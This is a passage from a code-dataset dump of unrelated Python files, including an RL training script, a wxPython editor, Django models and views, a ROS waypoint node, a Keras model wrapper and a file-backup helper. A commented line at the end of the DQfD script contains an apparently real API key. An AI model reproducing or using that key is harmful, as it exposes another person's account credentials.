open('./ddqn_mean_scores.p', 'rb') as f:\n # ddqn_mean_scores = pickle.load(f)\n # ----------------------------- get DQfD scores --------------------------------\n num_threads =Config.actor_num\n num_humanThread = Config.human_num\n actors = []\n acts = []\n threads = []\n #session = tf.InteractiveSession(config=tf.ConfigProto(log_device_placement=True))\n session = tf.InteractiveSession()\n env = gym.make(Config.ENV_NAME)\n replayMemory = Memory(capacity=Config.replay_buffer_size)\n coord = tf.train.Coordinator()\n \n scores, e, replay_full_episode = [], 0, None\n gameName = Config.GAME_NAME\n gameID = Config.ENV_NAME\n dataSetAction = Config.ACTION_SET\n env = gym.make(gameID)\n gymAction = env.unwrapped.get_action_meanings()\n actionTranslator = actionTranslate(gymAction, dataSetAction)\n episodeList = os.listdir(Config().SCREEN_PATH + gameName + '/') # dir is your directory path\n\n screenpath = Config.SCREEN_PATH\n trajpath = Config.TRAJ_PATH\n\n threads = []\n agent = DQfD('learner', env, DQfDConfig(), session, replayMemory)\n env = gym.make(Config.ENV_NAME)\n trainer = Trainer('leanner', env, agent,episodeList)\n trainer.run()\n #local = DQfD('actor0', env, DQfDConfig(), session, replayMemory)\n #actor = Actor('actor0' + 0, env, agent, local)\n #actor.run()\n #with tf.device('/gpu:0'):\n # agent = DQfD('learner', env, DQfDConfig(), session, replayMemory)\n # learner = Learner('learner', agent)\n # #learner.run()\n # #print(agent.getSelectNet())\n # learn = lambda: learner.run()\n # t = threading.Thread(target=learn)\n # t.start()\n # threads.append(t)\n #t = act = None\n #\n #actors = []\n #with tf.device('/cpu:0'):\n # for i in range(num_threads):\n # env = gym.make(Config.ENV_NAME)\n # local = DQfD('actor' + str(i), env, DQfDConfig(), session, replayMemory)\n # actor = Actor('actor' + str(i), env, agent, local)\n # actors.append(actor)\n # for j in range(num_threads):\n # act = lambda: actors[j].run()\n # t = threading.Thread(target= act)\n # t.start()\n # threads.append(t)\n #humans = []\n #with tf.device('/cpu:0'):\n # for i in range(num_humanThread):\n # env = gym.make(Config.ENV_NAME)\n # local = DQfD('human'+str(i), env, DQfDConfig(), session, replayMemory)\n # human = Human('human'+str(i), agent, local, episodeList)\n # humans.append(human)\n # for j in range(num_humanThread):\n # teach = lambda: humans[j].run()\n # t = threading.Thread(target=teach)\n # t.start()\n # threads.append(t)\n coord.join(threads)\n #scores = run_DQfD(0, env, agent)\n\n\n #dqfd_sum_scores = np.zeros(Config.episode)\n #for i in 
range(Config.iteration):\n # scores = run_DQfD(i, env)\n # dqfd_sum_scores = np.array([a + b for a, b in zip(scores, dqfd_sum_scores)])\n #dqfd_mean_scores = dqfd_sum_scores / Config.iteration\n #with open('./dqfd_mean_scores.p', 'wb') as f:\n # pickle.dump(dqfd_mean_scores, f, protocol=2)\n\n #map_scores(dqfd_scores=dqfd_mean_scores, ddqn_scores=ddqn_mean_scores,\n # xlabel='Red: dqfd Blue: ddqn', ylabel='Scores')\n env.close()\n# gym.upload('/tmp/carpole_DDQN-1', api_key='sk_VcAt0Hh4RBiG2yRePmeaLA')","sub_path":"DQfDTest.py","file_name":"DQfDTest.py","file_ext":"py","file_size_in_byte":35463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"433279221","text":"#!/usr/bin/env python\n\nimport wx\nimport os\n\nclass MainWindow(wx.Frame):\n \"\"\"we simple devie a new class of Frame\"\"\"\n def __init__(self,parent,title):\n wx.Frame.__init__(self,parent,title=title,size=(500,300))\n self.control=wx.TextCtrl(self,style=wx.TE_MULTILINE)\n self.CreateStatusBar()\n\n filemenu=wx.Menu()\n openmenu=wx.Menu()\n \n openfile = openmenu.Append(wx.ID_OPEN,\"O&pen\",\"open a file\")\n\n menuAbout= filemenu.Append(wx.ID_ABOUT,\"&about\",\"informationa about this program\")\n menuExit=filemenu.Append(wx.ID_EXIT,\"E&xit\",\"terminat the program\")\n\n menuBar=wx.MenuBar()\n\n menuBar.Append(filemenu, \"&File\")\n menuBar.Append(openmenu, \"&open\")\n self.SetMenuBar(menuBar)\n\n self.Bind(wx.EVT_MENU,self.OnAbout,menuAbout)\n self.Bind(wx.EVT_MENU,self.OnExit,menuExit)\n self.Bind(wx.EVT_MENU,self.OnOpen,openfile)\n filemenu.AppendSeparator()\n self.Show(True)\n\n def OnAbout(self,e):\n dlg=wx.MessageDialog(self,'a editor',\"about sam\")\n dlg.ShowModal()\n dlg.Destroy()\n\n def OnExit(self,e):\n self.Close(True)\n def OnOpen(self,e):\n \"\"\"open a file\"\"\"\n self.dirname=' '\n dlg = wx.FileDialog(self,\"choose a file\",self.dirname,\"\",\"*.*\",wx.OPEN)\n if dlg.ShowModal()==wx.ID_OK:\n self.filename = dlg.GetFilename()\n self.dirname = dlg.GetDirectory()\n f = open(os.path.join(self.dirname,self.filename))\n self.control.SetValue(f.read())\n f.close()\n dlg.Destroy()\n\napp=wx.App(False)\nframe=MainWindow(None,'small editor')\napp.MainLoop()\n","sub_path":"wxpython/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"511695204","text":"\"\"\" Faça um programa que apresente um menu de opções para o cálculo das seguintes operações entre dois números:\n-> Adição(opção 1) -> Subtração(opção 2) -> Multiplicação(opção 3) -> Divisão(opção 4) -> Saída(opção 5).\nO programa deve possibilitar ao usuário a escolha da operação desejada a exibição do resultado e a volta do menu de\nopções. O programa só termina quando for escolhida a opção de saída.\"\"\"\n\nlista = ['Adição', 'Subtração', 'Multiplicação', 'Divisão', 'Encerrar o programa']\nwhile True:\n n1 = float(input('Informe o 1º número: '))\n n2 = float(input('Informe o 2º número: '))\n print('=' * 30)\n print(f'{\"Código\":<10}{\"Operações\":<20}')\n print('=' * 30)\n for indice, valores in enumerate(lista):\n print(f'{indice + 1:<10}{valores:<20}')\n while True:\n try:\n resposta = int(input('Qual o código da operação que deseja ? '))\n except ValueError:\n print('Escolha uma opção válida entre 1 e 5. Tente novamente.')\n continue\n else:\n break\n while resposta < 1 or resposta > 5:\n print('ERRO ! Escolha uma opção válida. 
Tente novamente.')\n resposta = int(input('Qual o código da operação que deseja ? '))\n if resposta == 1:\n print(f'A soma entre {n1} e {n2} é igual a {n1 + n2}')\n elif resposta == 2:\n print(f'A subtração entre {n1} e {n2} é igual a {n1 - n2}')\n elif resposta == 3:\n print(f'A multiplicação entre {n1} e {n2} é igual a {n1 * n2}')\n elif resposta == 4:\n try:\n divisao = n1 / n2\n except ZeroDivisionError:\n print('Não é possivel realizar uma divisão com o denominador valendo 0.')\n else:\n print(f'A divisão entre {n1} e {n2} é igual a {divisao}')\n else:\n print('Programa encerrado. Volte sempre !!')\n break\n","sub_path":"Seção 6 - Estruturas de repetição/ex047.py","file_name":"ex047.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"314851270","text":"from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\nclass Reserva(models.Model):\n\tnombre = models.CharField(max_length=50, help_text='ej. Sebastian Sanchez')\n\trut = models.CharField(max_length=12, help_text='ej. 20.468.488-K')\n\temail = models.EmailField(max_length=100, help_text='ej. seba.sanchezs@alumnos.duoc.cl')\n\tcelular = models.CharField(max_length=200, help_text='ej. +56966107950', null=True, blank=True)\n\tfecha = models.DateTimeField(max_length=16, help_text='ej. 2019-11-25 15:30', default=timezone.now)\n\tcomentarios = models.TextField(max_length=200,\n\t\thelp_text='ej. Mesa para 2 con vista al exterior')\n\n\tdef __str__(self):\n\t\treturn self.rut","sub_path":"celta/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"470230856","text":"import numpy as np\nimport scipy.sparse as sp\nimport torch\nfrom texttable import Texttable\nfrom collections import OrderedDict\n\n\ndef get_n_params(model):\n pp=0\n for p in list(model.parameters()):\n nn=1\n for s in list(p.size()):\n nn = nn*s\n pp += nn\n return pp\n\ndef args_print(args):\n _dict = vars(args)\n t = Texttable() \n t.add_row([\"Parameter\", \"Value\"])\n for k in _dict:\n t.add_row([k, _dict[k]])\n print(t.draw())\n\ndef dcg_at_k(r, k):\n r = np.asfarray(r)[:k]\n if r.size:\n return r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))\n return 0.\n\ndef ndcg_at_k(r, k):\n dcg_max = dcg_at_k(sorted(r, reverse=True), k)\n if not dcg_max:\n return 0.\n return dcg_at_k(r, k) / dcg_max\n\n\ndef mean_reciprocal_rank(rs):\n rs = (np.asarray(r).nonzero()[0] for r in rs)\n return [1. / (r[0] + 1) if r.size else 0. 
for r in rs]\n\n\ndef normalize(mx):\n \"\"\"Row-normalize sparse matrix\"\"\"\n rowsum = np.array(mx.sum(1))\n if rowsum.min() == 0:\n rowsum = rowsum + 1\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n mx = r_mat_inv.dot(mx)\n return mx\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = torch.from_numpy(\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n values = torch.from_numpy(sparse_mx.data)\n shape = torch.Size(sparse_mx.shape)\n return torch.sparse.FloatTensor(indices, values, shape)\n\ndef randint():\n return np.random.randint(2**32 - 1)\n\n\n\ndef feature_OAG(layer_data, graph):\n feature = {}\n times = {}\n indxs = {}\n texts = []\n for _type in layer_data:\n if len(layer_data[_type]) == 0:\n continue\n idxs = np.array(list(layer_data[_type].keys()))\n tims = np.array(list(layer_data[_type].values()))[:,1]\n \n if 'node_emb' in graph.node_feature[_type]:\n feature[_type] = np.array(list(graph.node_feature[_type].loc[idxs, 'node_emb']), dtype=np.float)\n else:\n feature[_type] = np.zeros([len(idxs), 400])\n feature[_type] = np.concatenate((feature[_type], list(graph.node_feature[_type].loc[idxs, 'emb']),\\\n np.log10(np.array(list(graph.node_feature[_type].loc[idxs, 'citation'])).reshape(-1, 1) + 0.01)), axis=1)\n \n times[_type] = tims\n indxs[_type] = idxs\n \n if _type == 'paper':\n texts = np.array(list(graph.node_feature[_type].loc[idxs, 'title']), dtype=np.str)\n return feature, times, indxs, texts\n\n\ndef feature_MAG(layer_data, graph):\n feature = {}\n times = {}\n indxs = {}\n texts = []\n for _type in layer_data:\n if len(layer_data[_type]) == 0:\n continue\n idxs = np.array(list(layer_data[_type].keys()), dtype = np.int)\n tims = np.array(list(layer_data[_type].values()))[:,1]\n feature[_type] = graph.node_feature[_type][idxs]\n times[_type] = tims\n indxs[_type] = idxs\n \n return feature, times, indxs, texts","sub_path":"ogbn-mag/pyHGT/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198786642","text":"#!/usr/bin/env python\n\nfrom copy import deepcopy\nimport math\nimport rospy\nfrom geometry_msgs.msg import PoseStamped, PoseArray\nfrom tf.transformations import euler_from_quaternion\ntry:\n from autoware_msgs.msg import Lane, Waypoint\nexcept Exception as e:\n print(\"Exception: \" + str(e))\n print(\"autoware_msgs is not in the PATH\")\n print(\"do\")\n print(\"source ~/Autoware/ros/install/local_setup.bash\")\n print(\"And try again\")\n exit(-1)\n\n\nclass RvizToWaypoints(object):\n def __init__(self):\n self.pub = rospy.Publisher('/final_waypoints',\n Lane,\n queue_size=1)\n self.sub = rospy.Subscriber('/move_base_simple/goal',\n PoseStamped,\n self._cb,\n queue_size=1)\n rospy.loginfo(\"Initialized\")\n\n self.pub_debug = rospy.Publisher(\n '/rviz_waypoints', PoseArray, queue_size=1)\n\n def _cb(self, msg):\n ln = Lane()\n wp = Waypoint()\n wp.pose = deepcopy(msg)\n wp.twist.twist.linear.x = 1.94\n # Make a pre-goal pose 0.5m before with 7km/h speed\n o = msg.pose.orientation\n _, _, yaw = euler_from_quaternion([o.x, o.y, o.z, o.w])\n wp.pose.pose.position.x -= (math.cos(yaw) * 0.5)\n wp.pose.pose.position.y -= (math.sin(yaw) * 0.5)\n # Add another point after with 0 speed to stop at the goal\n wp_stop = Waypoint()\n 
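# (The pre-goal pose in _cb backs 0.5 m off the goal along its heading,
# i.e. (x - d*cos(yaw), y - d*sin(yaw)). A tiny standalone check:)
import math

def pre_goal_xy(x, y, yaw, d=0.5):
    # Point d metres behind (x, y) along heading yaw.
    return x - d * math.cos(yaw), y - d * math.sin(yaw)

assert pre_goal_xy(2.0, 3.0, 0.0) == (1.5, 3.0)   # facing +x: step back in -x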
wp_stop.twist.twist.linear.x = 0.0\n wp_stop.pose = deepcopy(msg)\n ln.waypoints.append(wp)\n ln.waypoints.append(wp_stop)\n self.pub.publish(ln)\n rospy.loginfo(\"Published /final_waypoints\")\n\n pa = PoseArray()\n pa.header.frame_id = msg.header.frame_id\n pa.poses.append(wp.pose.pose)\n pa.poses.append(wp_stop.pose.pose)\n self.pub_debug.publish(pa)\n\n\nif __name__ == '__main__':\n rospy.init_node('rviz_waypoints')\n r = RvizToWaypoints()\n rospy.spin()\n","sub_path":"moving_hackathon_tools/scripts/rviz_goal_to_waypoints.py","file_name":"rviz_goal_to_waypoints.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"592645691","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 13 19:58:57 2018\n\n@author: michelle\n\"\"\"\n\n# ATOC 4500 Final Project\n# 29 November 2018\n\n# Plotting katabatic wind streamlines in the ASE\n\n# Idea: look at summers 2005-2006, 2006-2007, 2007-2008\n# Create climatology for 2001-2010 period\n\nimport numpy as np\nfrom netCDF4 import Dataset\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\nif __name__ == '__main__':\n\n # Reading in daily u10m\n df_u = Dataset(\"/users/michelle/Desktop/Fall 2018/ATOC 4500-001/Project/KNMI/u10m.KNMI-2001.ASE055.ERAIN.DD.nc\",'r')\n print (df_u.variables.keys())\n print (df_u.variables['rotated_pole'])\n\n lon = df_u.variables['lon'][:] # Lon, degrees east, shape (361,456) = (lat,lon)\n lat = df_u.variables['lat'][:] # Lat, degrees north, shape (361,456) = (lat,lon)\n rlon = df_u.variables['rlon'][:] # Lon in rotated pole grid, degrees, X axis, shape (456)\n rlat = df_u.variables['rlat'][:] # Lat in rotated pole grid, degrees, Y axis, shape (361)\n direc = df_u.variables['dir'][:] # Angle of rotation, degrees, (361,456)\n # Fill Value: 9.969209968386869e+36\n height = df_u.variables['height'][:] # Height above the surface, m, postive up, (1)\n time = df_u.variables['time'][:] # Time, days since 1979-01-01, shape (3652)\n # Start date yyyymmddhh = 2001010100; 2001, January 1, 1:00\n u10m = df_u.variables['u10m'][:] # Zonal wind speed, m/s, shape (3652,1,361,456) = (time,height,lat,lon)\n # 24-hr average of 3-hr instantaneous values, grid mapping = rotated pole, m s^-1\n # Fill value: -9999.0\n rotated_pole = df_u.variables['rotated_pole']\n \n # Reading in daily v10m\n df_v = Dataset(\"/users/michelle/Desktop/Fall 2018/ATOC 4500-001/Project/KNMI/v10m.KNMI-2001.ASE055.ERAIN.DD.nc\",'r')\n print(df_v.variables.keys())\n print(df_v.variables['v10m'])\n v10m = df_v.variables['v10m'] # Meridional wind speed, m/s, shape (3652,1,361,456) = (time,height,lat,lon)\n # 24-hr average of 3-hr instantaneous values, grid mapping = rotated pole, m s^-1\n # Fill value: -9999.0\n\n # ---- \n \n \n # 12/11/2018 - Create figures of wind vectors\n \n # Specifying u10m, v10m bounds\n u10m = u10m[:,0,:,:] # Gets rid of height dimension\n v10m = v10m[:,0,:,:]\n \n \n \n # Polar Stereographic Projection for Katabatic Winds at t=0\n # Set date\n u10m_t0 = u10m[0,:,:]\n v10m_t0 = v10m[0,:,:]\n \n fig = plt.figure(figsize = (8,6))\n m = Basemap(projection='stere',lat_0=-73,lon_0=-113,resolution='l',\\\n llcrnrlon=-130,urcrnrlon=-98,llcrnrlat=-76.5,urcrnrlat=-69)\n m.drawcoastlines()\n m.drawparallels(np.arange(-89.,-60.,3.), labels=[1,0,0,0],fontsize=10)\n m.drawmeridians(np.arange(-180.,181.,20.), labels=[0,0,0,1],fontsize=10)\n \n # Using meshgrid on lon and lat\n #x,y = np.meshgrid(lon[::20,::20], 
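# (The [::6, ::6] strides used below thin the wind grid so the quiver plot
# stays readable; a quick shape check on an arbitrary array of the same size:)
import numpy as np

field = np.zeros((361, 456))
print(field[::6, ::6].shape)   # (61, 76): every 6th point in each dimension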
lat[::20,::20], sparse=True)\n x,y = np.meshgrid(lon[::6,::6], lat[::6,::6], sparse=True)\n xx,yy = m(x,y)\n \n # Plotting the vector field\n #m.quiver(x, y, -annual_mean_u10m[0,::7,::7], -annual_mean_v10m[0,::7,::7], width=0.002,scale=200)\n #m.quiver(xx, yy, -u10m_t0[::20,::20], -v10m_t0[::20,::20], width=0.002)\n m.quiver(xx, yy, u10m_t0[::6,::6], v10m_t0[::6,::6], width=0.002,scale=200)\n \n # Plot title\n plt.title(\"Katabatic Winds, 01-01-2001\")\n \n # Saving figure to file\n plt.savefig(\"/users/michelle/Desktop/Fall 2018/ATOC 4500-001/Project/KNMI/12-11_PIB_katabatic_t0.png\")\n plt.show()\n \n \n \n # ----\n \n # 12/11/2018 - (cont)\n \n # Create movie of Katabatic Winds for Dec 2001 - Feb 2002\n d0 = 8036 # Jan 1 2001\n # 6*31 + 28 + 4*30 = 186 + 28 + 120 = 334 (last day of Nov 2001)\n start_ind = 335 # time[335] == 8371\n # 31 + 31 + 28 = 90 (length of summer time period)\n end_ind = 424 # == 334 + 90, last day in February 2002\n \n inds = np.linspace(335,424,90)\n \n # Loop through each day in summer 2001-2002\n c = 0\n for ind in inds:\n ind = int(ind) # Needed to slice arrays below\n \n #if c==10:\n #break\n \n # Set dates\n u10m_ind = u10m[ind,:,:]\n v10m_ind = v10m[ind,:,:]\n \n # Make figure\n plt.close()\n fig = plt.figure(figsize = (8,6))\n m = Basemap(projection='stere',lat_0=-73,lon_0=-113,resolution='l',\\\n llcrnrlon=-130,urcrnrlon=-98,llcrnrlat=-76.5,urcrnrlat=-69)\n m.drawcoastlines()\n m.drawparallels(np.arange(-89.,-60.,3.), labels=[1,0,0,0],fontsize=10)\n m.drawmeridians(np.arange(-180.,181.,20.), labels=[0,0,0,1],fontsize=10)\n x,y = np.meshgrid(lon[::6,::6], lat[::6,::6], sparse=True)\n xx,yy = m(x,y)\n m.quiver(xx, yy, u10m_ind[::6,::6], v10m_ind[::6,::6], width=0.002,scale=200)\n plt.title(\"Katabatic Winds in Pine Island Bay\")\n plt.savefig(\"/users/michelle/Desktop/Fall 2018/ATOC 4500-001/Project/KNMI/video/12-11_PIB_katabatic_d\"+str(c)+\".png\")\n plt.show()\n \n c = c+1\n \n # ---- \n ","sub_path":"12-11-18_katabatic_vectorfield.py","file_name":"12-11-18_katabatic_vectorfield.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"223036666","text":"import ipaddress\r\nfrom .hash import CuckooHash\r\n\r\nH = CuckooHash(20000)\r\n\r\n\r\ndef insert_to_hash(topology_map):\r\n for i in topology_map:\r\n H[i[0]] = i[1]\r\n\r\n\r\ndef is_ip_valid(address):\r\n \"\"\"\r\n If address is a valid IP network, return it as an ipaddress object,\r\n otherwise, return None\r\n \"\"\"\r\n\r\n try:\r\n return ipaddress.ip_interface(address)\r\n except ValueError:\r\n return None\r\n\r\ndef distance(ip1):\r\n list = []\r\n \r\n for i in H.keys():\r\n x = abs(int(is_ip_valid(ip1)) - int(is_ip_valid(i)))\r\n list.append(x)\r\n return list\r\n\r\ndef ip_range(ip_addr, topology_map):\r\n \"\"\"\r\n From list keys in hash table return finding value-key pair\r\n :param ip_addr : ip looks up\r\n :return:\r\n \"\"\"\r\n \r\n insert_to_hash(topology_map)\r\n \r\n for i in H.keys():\r\n if is_ip_valid(ip_addr) in ipaddress.ip_network(i, False):\r\n return H[i]\r\n else:\r\n m = min(distance(is_ip_valid(ip_addr)))\r\n index = distance(is_ip_valid(ip_addr)).index(m)\r\n return H[H.keys()[index]]\r\n","sub_path":"alternative-polaris/polaris_common/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"192972859","text":"from __future__ import 
print_function\nfrom keras.models import Sequential\nfrom keras import layers\nfrom six.moves import range\n\n\nfrom common.model.training_effort_management import *\nfrom common.model.model_storage import *\n\nfrom common.misc.data_bender import *\nfrom common.misc.fileops import *\n\n\ndef model():\n\n # fn_setup_model = None # IN: input_size, label_size SIDE_EFFECT: save _model\n # fn_train_model = None # IN: num_of_iterations, Num_of_epochs, num_of_batches; SIDE_EFFECT: save and load _model\n # fn_train_on = None # IN: num_of_iterations SIDE_EFFECT: save and load _model\n # fn_stop_training = None #\n # fn_predict = None # IN: in_str; OUT: out_str\n\n _model = None\n _stop_running = False\n _x_train = None\n _y_train = None\n _x_val = None\n _y_val = None\n\n\n\n def fn_setup_model(inputs, labels):\n nonlocal _model\n nonlocal _x_train, _y_train, _x_val, _y_val\n _x_train, _x_val, _y_train, _y_val = data_breaker(inputs, labels)\n\n input_size = len(inputs[0])\n label_size = len(labels[0])\n\n HIDDEN_SIZE = 128\n # BATCH_SIZE = 128\n NUM_OF_HIDDEN_LAYERS = 1\n print('Build _model...')\n _model = Sequential()\n # \"Encode\" the input sequence using an RNN, producing an output of HIDDEN_SIZE.\n # Note: In a situation where your input sequences have a variable length,\n # use input_shape=(None, num_feature).\n _model.add(layers.LSTM(HIDDEN_SIZE, input_shape=(input_size, len(chars))))\n # As the decoder RNN's input, repeatedly provide with the last hidden state of\n # RNN for each time step. Repeat 'NUM_OF_DIGITS_IN_OPERAND + 1' times as that's the maximum\n # length of output, e.g., when NUM_OF_DIGITS_IN_OPERAND=3, max output is 999+999=1998.\n # _model.add(layers.RepeatVector(data_gen_dict['operand_size'] + 1))\n _model.add(layers.RepeatVector(label_size))\n # The decoder RNN could be multiple layers stacked or a single layer.\n for _ in range(NUM_OF_HIDDEN_LAYERS):\n # By setting return_sequences to True, return not only the last output but\n # all the outputs so far in the form of (num_samples, timesteps,\n # output_dim). This is necessary as TimeDistributed in the below expects\n # the first dimension to be the timesteps.\n _model.add(layers.LSTM(HIDDEN_SIZE, return_sequences=True))\n # Apply a dense layer to the every temporal slice of an input. 
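# (A minimal standalone sketch of this encoder/decoder shape flow; the sizes
# here are illustrative stand-ins for input_size, label_size and len(chars).)
from keras.models import Sequential as _Seq
from keras import layers as _layers

_sketch = _Seq()
_sketch.add(_layers.LSTM(128, input_shape=(7, 12)))      # encode   -> (batch, 128)
_sketch.add(_layers.RepeatVector(4))                     # repeat   -> (batch, 4, 128)
_sketch.add(_layers.LSTM(128, return_sequences=True))    # decode   -> (batch, 4, 128)
_sketch.add(_layers.TimeDistributed(_layers.Dense(12)))  # per step -> (batch, 4, 12)
_sketch.add(_layers.Activation('softmax'))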
For each of step\n # of the output sequence, decide which character should be chosen.\n _model.add(layers.TimeDistributed(layers.Dense(len(chars))))\n _model.add(layers.Activation('softmax'))\n fn_compile_model(_model)\n _model.summary()\n\n\n def fn_train_model(plugin_name, batch_size, num_of_iterations, num_of_epochs):\n\n nonlocal _model\n nonlocal _stop_running\n nonlocal _x_train, _y_train, _x_val, _y_val\n\n early_stopping_call_back = TrainingContinuationCallback(fn_stop_training)\n\n for iteration in range(0, num_of_iterations):\n if (_stop_running):\n break\n # pass\n print()\n print('-' * 50)\n print('Iteration', iteration)\n _model.fit(_x_train, _y_train,\n batch_size=batch_size,\n epochs=num_of_epochs,\n validation_data=( _x_val, _y_val),\n callbacks=[early_stopping_call_back],\n verbose=1)\n\n abs_model_path = get_abs_path('plugins/' + plugin_name + '/model_data/model')\n save_model(abs_model_path, _model)\n\n def fn_train_on():\n pass\n\n def fn_stop_training():\n nonlocal _stop_running\n _stop_running = True\n\n def fn_compile_model(model):\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n def fn_predict(in_str):\n out_str = None\n return out_str\n\n\n\n\n\n\n return (fn_setup_model, fn_train_model, fn_train_on, fn_stop_training, fn_compile_model, fn_predict)","sub_path":"plugins/expr_calc/model_if.py","file_name":"model_if.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"552899740","text":"import datetime\nimport transaction\n\nfrom pyramid.view import view_config\n\nfrom sprox.formbase import AddRecordForm\n\nfrom .models import (\n DBSession,\n Movie,\n Genre,\n Director,\n)\n\n\nclass NewMovieForm(AddRecordForm):\n __model__ = Movie\n __dropdown_field_names__ = {'directors':'title'}\n\n\n@view_config(\n route_name='movies_new',\n renderer='demo:templates/new_movies.pt',\n)\ndef new_movies_view(request):\n new_movie_form = NewMovieForm(DBSession)\n values = dict(request.POST)\n if request.method == 'POST''':\n try:\n new_movie_form.validate(params=request.POST)\n request.session.flash('validated')\n del values['sprox_id']\n values['genre'] = DBSession.query(Genre).get(values['genre'])\n values['directors'] = DBSession.query(Director).filter(\n Director.id.in_(request.POST.getall('directors'))).all()\n values['release_date'] = datetime.datetime.strptime(\n values['release_date'], '%Y-%m-%d')\n movie = Movie(**values)\n request.session.flash('about to insert')\n with transaction.manager:\n DBSession.add(movie)\n request.session.flash(\"Movie \" + movie.title + \" inserted\")\n except Exception as e:\n request.session.flash(\"Something bad has happened \", str(e))\n return {\n 'form': new_movie_form,\n 'values': {},\n }\n","sub_path":"demo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"593586253","text":"from django.urls import path, re_path\nfrom django.contrib.auth.decorators import login_required\nfrom apps.ventas.views import lista, index,ProductoCreate, ProductoList, ProductoUpdate,ProductoDelete, ProductoAPi\n\nurlpatterns = [\n path ('',index, name='index'),\n path ('nuevo',login_required(ProductoCreate.as_view()), name='venta_crear'),\n path ('listar',login_required(ProductoList.as_view()), name='venta_listar'),\n re_path (r'^venta/update/(?P\\d+)/$',login_required(ProductoUpdate.as_view()), 
name='venta_editar'),\n re_path (r'^venta/delete/(?P\\d+)/$',login_required(ProductoDelete.as_view()), name='venta_eliminar'),\n path('listado',lista, name=\"listado\"),\n path('api',ProductoAPi.as_view(), name=\"api\"),\n\n\n\n]\n","sub_path":"apps/ventas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"293683636","text":"import nest_asyncio\nnest_asyncio.apply()\n\nimport collections\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_federated as tff\nfrom matplotlib import pyplot as plt\n\nnp.random.seed(0)\n\n\n# load a non-i.i.d Federated data\n# https://en.wikipedia.org/wiki/Independent_and_identically_distributed_random_variables\n\nemnist_train, emnist_test = tff.simulation.datasets.emnist.load_data()\n# print train data length\nprint(len(emnist_train.client_ids))\n\nprint(emnist_train.element_type_structure)\n\nexample_dataset = emnist_train.create_tf_dataset_for_client(\n emnist_train.client_ids[0]\n)\n\nexample_element = next(iter(example_dataset))\n\nprint(type(example_element['label']))\nprint(example_element['label'].numpy())\n\nplt.imshow(example_element['pixels'].numpy(), cmap='gray', aspect='equal')\nplt.grid(False)\n_ = plt.show()\n\n\n\n","sub_path":"image_classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"22687225","text":"import os\nimport shutil\nimport hashlib\nimport argparse\n\nfrom .common import load_backup, save_backup\n\n\ndef backup(package, target):\n\tpackage_backup_directory = os.path.join(os.environ['CONFILES_BACKUP'], package)\n\tpackage_backup = load_backup(package)\n\n\tif package_backup.get(target):\n\t\treturn\n\n\tprint(\"Backup original {}\".format(target))\n\n\tbackup_file = None\n\n\tif os.path.exists(target):\n\t\tif not os.path.exists(package_backup_directory):\n\t\t\tos.makedirs(package_backup_directory)\n\n\t\thash = hashlib.md5()\n\t\thash.update(target.encode('utf-8'))\n\t\tbackup_file = os.path.join(package_backup_directory, hash.hexdigest())\n\n\t\tshutil.copy2(target, backup_file)\n\n\tpackage_backup[target] = dict(type='file', value=backup_file)\n\n\tsave_backup(package, package_backup)\n\n\ndef parse_arguments():\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('package', help='Name of the package')\n\tparser.add_argument('target', help='Target to backup')\n\n\treturn parser.parse_args()\n\nif __name__ == '__main__':\n\targs = parse_arguments()\n\tbackup(args.package, args.target)\n","sub_path":"confiles/package/helper/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"377923448","text":"import datetime, os, sys, math, time\nfrom datetime import timedelta\nfrom dateutil import parser\n\nif __name__ == '__main__': sys.path.append(\"..\")\nif __name__ == '__main__':\n from JuvoAPI import JuvoAPI\nelse:\n from sensor_mgmt.JuvoAPI import JuvoAPI\nfrom Entities.sysmon_log import Sysmon_Log\nfrom Entities.sensor_log import Sensor_Log\nfrom DAOs.connection_manager import connection_manager\nfrom 